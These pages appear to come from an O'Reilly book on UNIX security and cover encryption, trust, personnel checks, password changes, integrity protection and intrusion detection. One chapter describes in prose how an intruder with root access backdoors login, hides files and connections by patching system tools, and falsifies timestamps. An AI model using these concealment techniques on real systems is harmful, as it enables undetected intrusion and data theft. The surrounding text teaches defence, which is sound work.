when the attacker knows something about the contents of the messages encrypted with the cipher. Some very sophisticated<br />

mathematics are involved in such design.<br />

6.2.4 Why Use Encryption with <strong>UNIX</strong>?<br />

You might wonder why you need encryption if you are already using an operating system similar to <strong>UNIX</strong> that has passwords and<br />

uses file permissions to control access to sensitive information. The answer to this question is a single word: the superuser.<br />

A person with access to the <strong>UNIX</strong> superuser account can bypass all checks and permissions in the computer's filesystem. But there is<br />

one thing that the superuser cannot do: decrypt a file properly encrypted by a strong encryption algorithm without knowing the key.<br />

The reason for this limitation is the very difference between computer security controls based on file permissions and passwords, and<br />

controls based on cryptography. When you protect information with the <strong>UNIX</strong> filesystem, the information that you are trying to<br />

protect resides on the computer "in the clear." It is still accessible to your system manager (or someone else with superuser access), to<br />

a malicious computer hacker who manages to find a fault with your computer's overall security, or even to a thief who steals your<br />

computer in the night. You simply can't ensure that the data on your computer will never fall into the wrong hands.<br />

When you protect information with encryption, the information is protected by the secrecy of your key, the strength of the encryption<br />

algorithm, and the particular encryption implementation that you are using. Although your system manager (or someone who steals<br />

your computer) can access the encrypted file, they cannot decrypt the information stored inside that file.<br />

6.1 A Brief History of<br />

Cryptography<br />

6.3 The Enigma Encryption<br />

System<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_02.htm (3 of 3) [2002-04-12 10:45:01]


[Chapter 27] Who Do You Trust?<br />

Chapter 27<br />

27. Who Do You Trust?<br />

Contents:<br />

Can you Trust Your Computer?<br />

Can You Trust Your Suppliers?<br />

Can You Trust People?<br />

What All This Means<br />

Trust is the most important quality in computer security. If you build a bridge, you can look at the bridge<br />

every morning and make sure it's still standing. If you paint a house, you can sample the soil and analyze<br />

it at a laboratory to ensure that the paint isn't causing toxic runoff. But in the field of computer security,<br />

most of the tools that you have for determining the strength of your defenses and for detecting break-ins<br />

reside on your computer itself. Those tools are as mutable as the rest of your computer system.<br />

When your computer tells you that nobody has broken through your defenses, how do you know that you<br />

can trust what it is saying?<br />

27.1 Can you Trust Your Computer?<br />

For a few minutes, try thinking like a computer criminal. A few months ago you were fired from Big<br />

Whammix, the large smokestack employer on the other side of town, and now you're working for a<br />

competing company, Bigger Bammers. Your job at Bammers is corporate espionage; you've spent the<br />

last month trying to break into Big Whammix's central mail server. Yesterday, you discovered a bug in a<br />

version of sendmail [1] that Whammix is running, and you gained superuser access.<br />

[1] This is a safe enough bet - sendmail seems to have an endless supply of bugs and design<br />

misfeatures leading to security problems.<br />

What do you do now?<br />

Your primary goal is to gain as much valuable corporate information as possible, and to do so without<br />

leaving any evidence that would allow you to be caught. But you have a secondary goal of masking your<br />

steps, so that your former employers at Whammix will never figure out that they have lost information.<br />

Realizing that the hole in the Whammix sendmail daemon might someday be plugged, you decide to<br />

create a new back door that you can use to gain access to the company's computers in the future. The<br />

easiest thing to do is to modify the computer's /bin/login program to accept hidden passwords. Therefore,<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch27_01.htm (1 of 5) [2002-04-12 10:45:01]


[Chapter 27] Who Do You Trust?<br />

you take your own copy of the source code to login.c and modify it to allow anybody to log in as root if<br />

they type a particular sequence of apparently random passwords. Then you install the program as<br />

/bin/passwd .<br />

You want to hide evidence of your data collection, so you also patch the /bin/ls program. When the<br />

program is asked to list the contents of the directory in which you are storing your cracker tools and<br />

intercepted mail, it displays none of your files. You "fix" these programs so that the checksums reported<br />

by /usr/bin/sum are the same. Then, you manipulate the system clock or edit the raw disk to set all the<br />

times in the inodes back to their original values, to further cloak your modifications.<br />

You'll be connecting to the computer on a regular basis, so you also modify /usr/bin/netstat so that it<br />

doesn't display connections between the Big Whammix IP subnet and the subnet at Bigger Bammers.<br />

You may also modify the /usr/bin/ps and /usr/bin/who programs, so that they don't list users who are<br />

logged in via this special back door.<br />

Content, you now spend the next five months periodically logging into the mail server at Big Whammix<br />

and making copies of all of the email directed to the marketing staff. You do so right up to the day that<br />

you leave your job at Bigger Bammers and move on to a new position at another firm. On your last day,<br />

you run a shell script that you have personally prepared that restores all of the programs on the hard disk<br />

to their original configuration. Then, as a parting gesture, your program introduces subtle modifications<br />

into the Big Whammix main accounting database.<br />

Technological fiction? Hardly. By the middle of the 1990s, attacks against computers in which the<br />

system binaries were modified to prevent detection of the intruder had become commonplace. After<br />

sophisticated attackers gain superuser access, the common way that you discover their presence is if they<br />

make a mistake.<br />

27.1.1 Harry's Compiler<br />

In the early days of the MIT Media Lab, there was a graduate student who was very unpopular with the<br />

other students in his lab. To protect his privacy, we'll call the unpopular student "Harry."<br />

Harry was obnoxious and abrasive, and he wasn't a very good programmer either. So the other students<br />

in the lab decided to play a trick on him. They modified the PL/1 compiler on the computer that they all<br />

shared so that the program would determine the name of the person who was running it. If the person<br />

running the compiler was Harry, the program would run as usual, reporting syntax errors and the like, but<br />

it would occasionally, randomly, not produce a final output file.<br />

This mischievous prank caused a myriad of troubles for Harry. He would make a minor change to his<br />

program, run it, and - occasionally - the program would run the same way as it did before he made his<br />

modification. He would fix bugs, but the bugs would still remain. But then, whenever he went for help,<br />

one of the other students in the lab would sit down at the terminal, log in, and everything would work<br />

properly.<br />

Poor Harry. It was a cruel trick. Somehow, though, everybody forgot to tell him about it. He soon grew<br />

frustrated with the whole enterprise, and eventually left school.<br />

And you thought those random "bugs" in your system were there by accident?<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch27_01.htm (2 of 5) [2002-04-12 10:45:01]


[Chapter 27] Who Do You Trust?<br />

27.1.2 Trusting Trust<br />

Perhaps the definitive account of the problems inherent in computer security and trust is related in Ken<br />

Thompson's article, "Reflections on Trusting Trust." [2] Thompson describes a back door planted in an<br />

early research version of <strong>UNIX</strong>.<br />

[2] Communications of the ACM, Volume 27, Number 8, August 1984.<br />

The back door was a modification to the /bin/login program that would allow him to gain superuser<br />

access to the system at any time, even if his account had been deleted, by providing a predetermined<br />

username and password. While such a modification is easy to make, it's also an easy one to detect by<br />

looking at the computer's source code. So Thompson modified the computer's C compiler to detect if it<br />

was compiling the login.c program. If so, then the additional code for the back door would automatically<br />

be inserted into the object-code stream, even though the code was not present in the original C source<br />

file.<br />

Thompson could now have the login.c program inspected by his coworkers, compile the program, install<br />

the /bin/login executable, and yet be assured that the back door was firmly in place.<br />

But what if somebody inspected the source code for the C compiler itself? Thompson thought of that<br />

case as well. He further modified the C compiler so that it would detect whether it was compiling the<br />

source code for itself. If so, the compiler would automatically insert the special program recognition<br />

code. After one more round of compilation, Thompson was able to put all the original source code back<br />

in place.<br />

Thompson's experiment was like a magic trick. There was no back door in the login.c source file and no<br />

back door in the source code for the C compiler, and yet there was a back door in both the final compiler<br />

and in the login program. Abracadabra!<br />

What hidden actions do your compiler and login programs perform?<br />

27.1.3 What the Superuser Can and Cannot Do<br />

As all of these examples illustrate, technical expertise combined with superuser privileges on a computer<br />

is a powerful combination. Together, they let an attacker change the very nature of the computer's<br />

operating system. An attacker can modify the system to create "hidden" directories that don't show up<br />

under normal circumstances (if at all). Attackers can change the system clock, making it look as if the<br />

files that they modify today were actually modified months ago. An attacker can forge electronic mail.<br />

(Actually, anybody can forge electronic mail, but an attacker can do a better job of it.)<br />

Of course, there are some things that an attacker cannot do, even if that attacker is a technical genius and<br />

has full access to your computer and its source code. An attacker cannot, for example, decrypt a message<br />

that has been encrypted with a perfect encryption algorithm. But he can alter the code to record the key<br />

the next time you type it. An attacker probably can't program your computer to perform mathematical<br />

calculations a dozen times faster than it currently does, although there are few security implications to<br />

doing so. Most attackers can't read the contents of a file after it's been written over with another file<br />

unless they take apart your computer and take the hard disk to a laboratory. However, an attacker with<br />

privileges can alter your system so that files you have deleted are still accessible (to him).<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch27_01.htm (3 of 5) [2002-04-12 10:45:01]


[Chapter 27] Who Do You Trust?<br />

In each case, how do you tell if the attack has occurred?<br />

The "what-if" scenario can be taken to considerable lengths. Consider an attacker who is attempting to<br />

hide a modification in a computer's /bin/login program:<br />

Table 27.1: The "What-If" Scenario<br />

What the Attacker Might Do After Gaining Your Responses<br />

Root Access<br />

The attacker plants a back door in the /bin/login You use PGP to create a digital signature of all<br />

program to allow unauthorized access.<br />

system programs. You check the signatures every<br />

day.<br />

The attacker modifies the version of PGP that you You copy /bin/login onto another computer before<br />

are using, so that it will report that the signature on verifying it with a trusted copy of PGP.<br />

/bin/login verifies, even if it doesn't.<br />

The attacker modifies your computer's kernel by You put a copy of PGP on a removable hard disk.<br />

adding loadable modules, so that when the You mount the hard disk to perform the signature<br />

/bin/login is sent through a TCP connection, the verification and then unmount it. Furthermore, you<br />

original /bin/login, rather than the modified version, put a good copy of /bin/login onto your removable<br />

is sent.<br />

hard disk and then copy the good program over the<br />

installed version on a regular basis.<br />

The attacker regains control of your system and You reinstall the entire system software, and<br />

further modifies the kernel so that the modification configure the system to boot from a read-only<br />

to /bin/login is patched into the running program device such as a CD-ROM.<br />

after it loads. Any attempt to read the contents of<br />

the /bin/login file results in the original, unmodified<br />

version.<br />

Because the system now boots from a CD-ROM, Your move . . .<br />

you cannot easily update system software as bugs<br />

are discovered. The attacker waits for a bug to crop<br />

up in one of your installed programs, such as<br />

sendmail. When the bug is reported, the attacker<br />

will be ready to pounce.<br />

(See Table 27.1.)<br />

If you think that this description sounds like a game of chess, you're correct. <strong>Practical</strong> computer security<br />

is a series of actions and counteractions, of attacks and defenses. As with chess, success depends upon<br />

anticipating your opponent's moves and planning countermeasures ahead of time. Simply reacting to your<br />

opponent's moves is a recipe for failure.<br />

The key thing to note, however, is that somewhere, at some level, you need to trust what you are working<br />

with. Maybe you trust the hardware. Maybe you trust the CD-ROM. But at some level, you need to trust<br />

what you have on hand. Perfect security isn't possible, so we need to settle for the next best thing -<br />

reasonable trust on which to build.<br />

The question is, where do you place that trust?<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch27_01.htm (4 of 5) [2002-04-12 10:45:01]


[Chapter 27] Who Do You Trust?<br />

26.4 Other Liability 27.2 Can You Trust Your<br />

Suppliers?<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch27_01.htm (5 of 5) [2002-04-12 10:45:01]


[Chapter 13] Personnel <strong>Sec</strong>urity<br />

Chapter 13<br />

13. Personnel <strong>Sec</strong>urity<br />

Contents:<br />

Background Checks<br />

On the Job<br />

Outsiders<br />

Consider a few recent incidents that made the news:<br />

●<br />

●<br />

Nick Leeson, an investment trader at the Barings Bank office in Singapore, and Toshihide Iguchi<br />

of the Daiwa Bank office in New York City each made risky investments and lost substantial<br />

amounts of their bank's funds. Rather than admit to the losses, each of them altered computer<br />

records and effectively gambled more money to recoup the losses. Eventually, both were<br />

discovered after each bank lost more than one billion dollars. As a result, Barings was forced into<br />

insolvency, and Daiwa may not be allowed to operate in the United States in the future.<br />

In the U.S., personnel with the CIA and armed forces with high-security clearances (Aldrich<br />

Ames, Jonathon Pollard, and Robert Walker) were discovered to have been passing classified<br />

information to Russia and to Israel. Despite several special controls for security, these individuals<br />

were able to commit damaging acts of espionage.<br />

If you examine these cases and the vast number of computer security violations committed over the past<br />

few decades, you will find one common characteristic: 100% of them were caused by people. Break-ins<br />

were caused by people. Computer viruses were written by people. Passwords were stolen by people.<br />

Without people, we wouldn't have computer security problems! However, we continue to have people<br />

involved with computers, so we need to be concerned with personnel security.<br />

"Personnel security" is everything involving employees: hiring them, training them, monitoring their<br />

behavior, and sometimes, handling their departure. Statistics show that the most common perpetrators of<br />

significant computer crime are those people who have legitimate access now, or who have recently had<br />

access; some studies show that over 80% of incidents are caused by these individuals. Thus, managing<br />

personnel with privileged access is an important part of a good security plan.<br />

People are involved in computer security problems in two ways. Some people unwittingly aid in the<br />

commission of security incidents by failing to follow proper procedure, by forgetting security<br />

considerations, and by not understanding what they are doing. Other people knowingly violate controls<br />

and procedures to cause or aid an incident. As we have noted earlier, the people who knowingly<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch13_01.htm (1 of 3) [2002-04-12 10:45:02]


[Chapter 13] Personnel <strong>Sec</strong>urity<br />

contribute to your security problems are most often your own users (or recent users): they are the ones<br />

who know the controls, and know what information of value may be present.<br />

You are likely to encounter both kinds of individuals in the course of administering a <strong>UNIX</strong> system. The<br />

controls and mechanisms involved in personnel security are many and varied. Discussions of all of them<br />

could fill an entire book, so we'll simply summarize some of the major considerations.<br />

13.1 Background Checks<br />

When you hire new employees, check their backgrounds. You may have candidates fill out application<br />

forms, but then what do you do? At the least, you should check all references given by each applicant to<br />

determine his past record, including reasons why he left those positions. Be certain to verify the dates of<br />

employment, and check any gaps in the record. One story we heard involved an applicant who had an<br />

eight-year gap in his record entitled "independent consulting." Further research revealed that this<br />

"consulting" was being conducted from inside a Federal prison cell - something the applicant had failed<br />

to disclose, no doubt because it was the result of a conviction for computer-based fraud.<br />

You should also verify any claims of educational achievement and certification: stories abound of<br />

individuals who have claimed to have earned graduate degrees from prestigious universities - universities<br />

that have no records of those individuals ever completing a class. Other cases involve degrees from<br />

"universities" that are little more than a post office box.<br />

Consider that an applicant who lies to get a job with you is not establishing a good foundation for future<br />

trust.<br />

In some instances you may want to make more intensive investigations of the character and background<br />

of the candidates. You may want to:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Have an investigation agency do a background check.<br />

Get a criminal record check of the individual.<br />

Check the applicant's credit record for evidence of large personal debt and the inability to pay it.<br />

Discuss problems, if you find them, with the applicant. People who are in debt should not be<br />

denied jobs: if they are, they will never be able to regain solvency. At the same time, employees<br />

who are under financial strain may be more likely to act improperly.<br />

Conduct a polygraph examination of the applicant (if legal).<br />

Ask the applicant to obtain bonding for his position.<br />

In general, we don't recommend these steps for hiring every employee. However, you should conduct<br />

extra checks of any employee who will be in a position of trust or privileged access - including<br />

maintenance and cleaning personnel.<br />

We also suggest that you inform the applicant that you are performing these checks, and obtain his or her<br />

consent. This courtesy will make the checks easier to perform and will put the applicant on notice that<br />

you are serious about your precautions.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch13_01.htm (2 of 3) [2002-04-12 10:45:02]


[Chapter 13] Personnel <strong>Sec</strong>urity<br />

12.4 Story: A Failed Site<br />

Inspection<br />

13.2 On the Job<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch13_01.htm (3 of 3) [2002-04-12 10:45:02]


[Chapter 3] 3.4 Changing Your Password<br />

Chapter 3<br />

Users and Passwords<br />

3.4 Changing Your Password<br />

You can change your password with the <strong>UNIX</strong> passwd command. passwd first asks you to type your old<br />

password, then asks for a new one. By asking you to type your old password first, passwd prevents<br />

somebody from walking up to a terminal that you left yourself logged into and then changing your<br />

password without your knowledge.<br />

<strong>UNIX</strong> makes you type the password twice when you change it:<br />

% passwd<br />

Changing password for sarah.<br />

Old password:tuna4fis<br />

New password: nosmis32<br />

Retype new password: nosmis32<br />

%<br />

If the two passwords you type don't match, your password remains unchanged. This is a safety<br />

precaution: if you made a mistake typing the new password and <strong>UNIX</strong> only asked you once, then your<br />

password could be changed to some new value and you would have no way of knowing that value.<br />

NOTE: On systems that use Sun Microsystems' NIS or NIS+, you may need to use the<br />

command yppasswd or nispasswd to change your password. Except for having different<br />

names, these passwords work the same way as passwd. However, when they run, they<br />

update your password in the network database with NIS or NIS+. When this happens, your<br />

password will be immediately available on other clients on the network. With NIS, your<br />

password will be distributed during the next regular update.<br />

Even though passwords are not echoed when they are printed, the BACKSPACE or DELETE key (or<br />

whatever key you have bound to the "erase" function) will still delete the last character typed, so if you<br />

make a mistake, you can correct it.<br />

After you have changed your password, your old password is no good. Do not forget your new password!<br />

If you forget your new password, you will need to have the system administrator set it to something you<br />

can use to log in and try again.<br />

If your system administrator gives you a new password, immediately change it to something else that<br />

only you know! Otherwise, if your system administrator is in the habit of setting the same password for<br />

forgetful users, your account may be compromised by someone else who has had a temporary lapse of<br />

memory; see the following sidebar for an example.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_04.htm (1 of 2) [2002-04-12 10:45:02]


[Chapter 3] 3.4 Changing Your Password<br />

NOTE: If you get email from your system manager, advising you that there are system<br />

problems and that you should immediately change your password to "tunafish" (or some<br />

other value), disregard the message and report it to your system management. These kinds<br />

of email messages are frequently sent by computer crackers to novice users. The hope is that<br />

the novice user will comply with the request and change his password to the one that is<br />

suggested - often with devastating results.<br />

3.3 Entering Your Password 3.5 Verifying Your New<br />

Password<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_04.htm (2 of 2) [2002-04-12 10:45:02]


[Chapter 9] Integrity Management<br />

Chapter 9<br />

9. Integrity Management<br />

Contents:<br />

Prevention<br />

Detecting Change<br />

A Final Note<br />

As we noted in Chapter 2, Policies and Guidelines, there are several different aspects to computer<br />

security. Integrity is, in most environments, the most important aspect of computer security.<br />

Paradoxically, integrity is also the aspect of security that has also been given low priority by practitioners<br />

over the years. This is so, in large part, because integrity is not the central concern of military security -<br />

the driving force behind most computer security research and commercial development over the past few<br />

decades. In the military model of security, we want to prevent unauthorized personnel from reading any<br />

sensitive data. We also want to prevent anyone from reading data that may not be sensitive, but that can<br />

be combined with other data to compromise information. This is called confidentiality and is of<br />

paramount importance in the military view of computer security.<br />

Confidentiality is a weird priority. It leads us to security policies in which it is acceptable, at some level,<br />

to blow up the computer center, burn the backup tapes, and kill all the users - provided that the data files<br />

are not read by the attacker!<br />

In most commercial and research environments, integrity is more important than confidentiality. If<br />

integrity were not the priority, the following scenarios might actually seem reasonable:<br />

"Well, whoever came in over the net wiped out all of /usr and /etc, but they weren't able to<br />

read any of the files in /tmp. I guess our security worked!"<br />

-or-<br />

"Somebody compromised the root account and added 15 new users to /etc/passwd, but our<br />

security system kept them from doing an ls of the /usr/spool/mail directory. We dodged a<br />

bullet on this one!" -or-<br />

"As near as we can tell, one of the people we fired last week planted a virus in the system<br />

that has added itself to every system binary, and the virus is causing the system to crash<br />

every 15 minutes. We don't have a security problem, though, because we have shut off the<br />

network connection to the outside, so nobody will know about it."<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch09_01.htm (1 of 6) [2002-04-12 10:45:03]


[Chapter 9] Integrity Management<br />

These examples are obviously silly in most settings. We do care about integrity: protecting our data from<br />

unauthorized modification or deletion. In many commercial environments, both confidentiality and<br />

integrity are important, but integrity is more important. Most banks, for example, desire to keep the<br />

account balances of their depositors both secret and correct. But, given a choice between having balances<br />

revealed and having them altered, the first is preferable to the second. Integrity is more important than<br />

confidentiality.<br />

In a typical <strong>UNIX</strong> system, protecting the integrity of system and user data can be a major challenge.<br />

There are many ways to alter and remove data, and often as little as a single bit change (like a protection<br />

bit or owner UID) can result in the opportunity to make more widespread changes.<br />

But ensuring integrity is difficult. Consider some of the ways that an unauthorized user could change or<br />

delete the file /usr/spaf/notes owned by user spaf:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Permissions on notes allow modification by other users.<br />

Someone is able to compromise the login password of user spaf.<br />

Someone is able to compromise user root.<br />

setuid programs to root or to spaf allow the file to be altered.<br />

Permissions on one of the directories /, /usr, or /usr/spaf allow the file to be deleted.<br />

Permissions can also allow the file /usr/spaf/notes to be moved and a new file created in its place.<br />

The new file would have ownership and permissions based on who created it. In a sense, the<br />

original file would not have been deleted, but only renamed.<br />

Permissions for the group "owner" of the file or one of the containing directories allow another<br />

user to modify it.<br />

/etc/passwd can be altered by an unauthorized user, allowing someone to become root or user spaf.<br />

The block device representing the disk containing the file can be written to by an unprivileged<br />

user.<br />

The raw device representing the disk containing the file can be written to by an unprivileged user.<br />

The directory is exported using some network filesystem that can be compromised and written to<br />

by an external host.<br />

Buggy software allows the file to be altered by an unauthorized user.<br />

Permissions on a system binary allow an unauthorized individual to plant a Trojan Horse or virus<br />

that modifies the file.<br />

And that is a partial list!<br />

The goal of good integrity management is to prevent alterations to (or deletions of) data, to detect<br />

modifications or deletions if they occur, and to recover from alterations or deletions if they happen. In<br />

the next few sections, we'll present methods of attaining these goals.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch09_01.htm (2 of 6) [2002-04-12 10:45:03]


[Chapter 9] Integrity Management<br />

9.1 Prevention<br />

Whenever possible, we would like to prevent unauthorized alteration or deletion of data on our systems.<br />

We can do so via software controls and some hardware means. We have discussed many of the software<br />

methods available on <strong>UNIX</strong> systems in other chapters. These have included setting appropriate<br />

permissions on files and directories, restricting access to the root account, and controlling access to<br />

remote services.<br />

Unfortunately, no matter how vigilant we may be, bugs occur in software (more often than they should!),<br />

and configuration errors are made.[1] In such cases, we desire that data be protected by something at a<br />

lower level - something in which we might have more confidence.<br />

[1] In a presentation by Professor Matt Bishop of UC Davis, he concluded that as many as<br />

95% of reported <strong>UNIX</strong> security incidents that he studied might be the results of<br />

misconfiguration!<br />

9.1.1 Immutable and Append-Only Files<br />

Two new mechanisms were built into the BSD 4.4 version of <strong>UNIX</strong>: the immutableand append-only<br />

files. These wonderful mechanisms are present only (at the time of this writing, to the best of our<br />

knowledge) in the FreeBSD, NetBSD, and BSDI versions of <strong>UNIX</strong>. The fact that more commercial<br />

vendors have not seen fit to integrate this idea in their products is a pity.<br />

As their names imply, immutable files are files that cannot be modified once the computer is running.<br />

They are ideally suited to system configuration files, such as /etc/rc and /etc/inetd.conf. Append-only<br />

files are files to which data can be appended, but in which existing data cannot be changed. They are<br />

ideally suited to log files.<br />

To implement these new file types, BSD 4.4 introduced a new concept called the kernel security level.<br />

Briefly, the kernel security level defines four levels of security. Any process running as superuser can<br />

raise the security level, but only the init process (process number 1) can lower it. There are four security<br />

levels (see Table 9.1).:<br />

Table 9.1: BSD 4.4 <strong>Sec</strong>urity Levels<br />

<strong>Sec</strong>urity Level Mode Meaning<br />

-1 Permanently insecure Normal <strong>UNIX</strong> behavior<br />

0 Insecure mode Immutable and append-only flags can be changed.<br />

1 <strong>Sec</strong>ure mode The immutable and append-only flags cannot be changed. <strong>UNIX</strong><br />

devices that correspond to mounted filesystems, as well as the<br />

/dev/mem and /dev/kmem devices, are read-only.<br />

2 Highly secure mode A superset of the secure mode. All disk devices are read-only,<br />

whether or not they correspond to mounted filesystems. This<br />

prevents an attacker from unmounting a filesystem to modify the<br />

raw bits on the device, but it prevents you from creating new<br />

filesystems with the newfs command while the system is<br />

operational.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch09_01.htm (3 of 6) [2002-04-12 10:45:03]


[Chapter 9] Integrity Management<br />

The 4.4 BSD filesystem does not allow any changes to files that are immutable or append-only. Thus,<br />

even if an attacker obtains superuser access, he cannot modify these files. Furthermore, the system<br />

prevents "on-the-fly" patching of the operating system by making writes to the /dev/mem or /dev/kmem<br />

devices. Properly configured, these new innovations can dramatically improve a system's resistance to a<br />

determined attacker.<br />

Of course, immutable files can be overcome by an attacker who has physical access to the computer: the<br />

attacker could simply reboot the computer in single-user mode, before the system switches into secure<br />

mode. However, if someone has physical access, that person could just as easily remove the disk and<br />

modify it on another computer system. In most environments, physical access can be restricted<br />

somewhat. If an attacker at a remote site shuts down the system, thus enabling writing of the partition,<br />

that attacker also shuts down any connection he would use to modify that partition.<br />

Although these new filesystem structures are a great idea, it is still possible to modify data within<br />

immutable files if care is not taken. For instance, an attacker might compromise root and alter some of<br />

the programs used by the system during start-up. Thus, many files need to be protected with immutability<br />

if the system is to be used effectively.<br />

9.1.2 Read-only Filesystems<br />

A somewhat stronger preventive mechanism is to use hardware read-only protection of the data. To do<br />

so requires setting a physical write-protect switch on a disk drive or mounting the data using a CD-ROM.<br />

The material is then mounted using the software read-only option with the mount command. The best<br />

crackers in the business can't come across the network and write to a read-only CD-ROM!<br />

NOTE: The read-only option to the mount command does not protect data! Disks mounted<br />

with the read-only option can still be written to using the raw device interface to the disk -<br />

the option only protects access to the files via the block device interface. Furthermore, an<br />

attacker who has gained the appropriate privileges (e.g., root) can always remount the disk<br />

read/write.<br />

The existence of the read-only option to the mountcommand is largely for when a physically<br />

protected disk is mounted read-only; without the option, <strong>UNIX</strong> would attempt to modify the<br />

"last access" times of files and directories as they were read, which would lead to many<br />

error messages.<br />

If it is possible to structure the system to place all the commands, system libraries, system databases, and<br />

important directories on read-only media, the system can be made considerably safer. To modify one of<br />

these files, an unauthorized user would require physical access to the disk drive to reset the switch, and<br />

sufficient access to the system (physical access or operator privileges) to remount the partition. In many<br />

cases, this access can be severely restricted. Unmounting and remounting a disk would likely be noticed,<br />

too!<br />

In those cases in which the owner needs to modify software or install updates, it should be a simple<br />

matter to shut down the system in an orderly manner and then make the necessary changes. As an added<br />

benefit, the additional effort required to make changes in a multiuser system might help deter<br />

spur-of-the-moment changes, or the installation of software that is too experimental in nature. (Of course,<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch09_01.htm (4 of 6) [2002-04-12 10:45:03]


[Chapter 9] Integrity Management<br />

this whole mechanism would not be very helpful to a dedicated Linux hacker who may be making daily<br />

changes. As with any approach, it isn't for everyone.)<br />

The way to organize a system to use read-only disks requires assistance from the vendor of the system.<br />

The vendor needs to structure the system so that the few system files that need to be modified on a<br />

frequent basis are located on a different partition from the system files that are to be protected. These<br />

special files include log files, /etc/motd, utmp, and other files that might need to be altered as part of<br />

regular operation (including, perhaps, /etc/passwd if your users change passwords or shells frequently).<br />

Most modern systems have symbolic links that can be used for this purpose. In fact, systems that support<br />

diskless workstations are often already configured in this manner: volatile files are symbolically linked to<br />

a location on a /var partition. This link allows the binaries to be mounted read-only from the server and<br />

shared by many clients.<br />

There are some additional benefits to using read-only storage for system files. Besides the control over<br />

modification (friendly and otherwise) already noted, consider the following:<br />

●<br />

●<br />

●<br />

●<br />

You only need to do backups of the read-only partitions once after each change - there is no need<br />

to waste time or tapes performing daily or weekly backups<br />

In a large organization, you can put a "standard" set of binaries up on a network file server - or cut<br />

a "standard" CD-ROM to be used by all the systems making configuration management and<br />

portability much simpler<br />

There is no need to set disk quotas on these partitions, as the contents will not grow except in<br />

well-understood (and monitored) ways<br />

There is no need to run periodic file clean or scan operations on these disks as the contents will not<br />

change<br />

There are some drawbacks and limitations to read-only media, however:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

This media is difficult to employ for user data protection. Usually, user data is too volatile for<br />

read-only media. Furthermore, it would require that the system administrator shut down the system<br />

each time a user wanted to make a change. This requirement would not work well in a multiuser<br />

environment.<br />

Few vendors supply disks capable of operating in this mode as a matter of course. Most disks in<br />

workstations are internal, and do not have a write-protect switch.<br />

It requires that an entire disk be made read-only.[2] There may be a large amount of wasted space<br />

on the disk.<br />

[2] Some disks allow only a range of sectors to be protected, but these are not the<br />

norm.<br />

This media requires at least two physical disks per machine (unless you import network<br />

partitions) - the read-only disk for system files, and a disk for user files.<br />

If you are operating from a CD-ROM disk, these may have slower access times than a standard<br />

internal read/write disk.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch09_01.htm (5 of 6) [2002-04-12 10:45:03]


[Chapter 9] Integrity Management<br />

8.8 Administrative<br />

Techniques for Conventional<br />

Passwords<br />

9.2 Detecting Change<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch09_01.htm (6 of 6) [2002-04-12 10:45:03]


[Chapter 24] 24.2 Discovering an Intruder<br />

Chapter 24<br />

Discovering a Break-in<br />

24.2 Discovering an Intruder<br />

There are several ways you might discover a break-in:<br />

●<br />

●<br />

●<br />

●<br />

Catching the perpetrator in the act. For example, you might see the superuser logged in from a dial-up terminal when you<br />

are the only person who should know the superuser password.<br />

Deducing that a break-in has taken place based on changes that have been made to the system. For example, you might<br />

receive an electronic mail message from an attacker taunting you about a security hole, or you may discover new account<br />

entries in your /etc/passwd file.<br />

Receiving a message from a system administrator at another site indicating strange activity at his or her site that has<br />

originated from an account on your machine.<br />

Strange activities on the system, such as system crashes, significant hard disk activity, unexplained reboots, minor<br />

accounting discrepancies,[1] or sluggish response when it is not expected (Crack may be running on the system).<br />

[1] See Cliff Stoll's The Cuckoo's Egg for the tale of how such a discrepancy led to his discovery of a hacker's<br />

activities.<br />

There are a variety of commands that you can use to discover a break-in, and some excellent packages, such as Tiger and<br />

Tripwire, described elsewhere in this book. Issue these commands on a regular basis, but execute them sporadically as well. This<br />

introduces a factor of randomness that can make perpetrators unable to cover their tracks. This principle is a standard of<br />

operations security: try to be unpredictable.<br />

24.2.1 Catching One in the Act<br />

The easiest way to catch an intruder is by looking for events that are out of the ordinary. For example:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

A user who is logged in more than once. (Many window systems register a separate login for each window that is opened by<br />

